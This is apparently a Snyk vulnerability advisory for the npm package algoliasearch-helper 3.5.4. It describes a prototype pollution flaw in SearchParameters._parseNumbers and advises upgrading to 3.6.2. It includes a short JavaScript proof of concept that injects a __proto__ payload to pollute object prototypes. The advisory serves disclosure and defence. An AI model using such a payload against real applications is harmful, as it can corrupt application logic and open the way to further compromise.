algoliasearch-helper@3.5.4 vulnerabilities

Helper for implementing advanced search features with algolia

  • latest version

    3.22.6

  • latest non vulnerable version

  • first published

    9 years ago

  • latest version published

    6 days ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the algoliasearch-helper package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Prototype Pollution

    algoliasearch-helper is a Helper for implementing advanced search features with algolia

    Affected versions of this package are vulnerable to Prototype Pollution due to use of the merge function in src/SearchParameters/index.js#SearchParameters._parseNumbers without any protection against prototype properties.

    Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns.

    PoC

    // Run npm i algoliasearch-helper, then run the below code
    const algohelp = require('algoliasearch-helper')
    var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable to PP"}}');
    var test = {};
    console.log("Before: " + test.polluted); // Before: undefined
    algohelp.SearchParameters._parseNumbers(payload); // {}
    console.log("After: " + test.polluted); // After: vulnerable to PP
    

    How to fix Prototype Pollution?

    Upgrade algoliasearch-helper to version 3.6.2 or higher.

    <3.6.2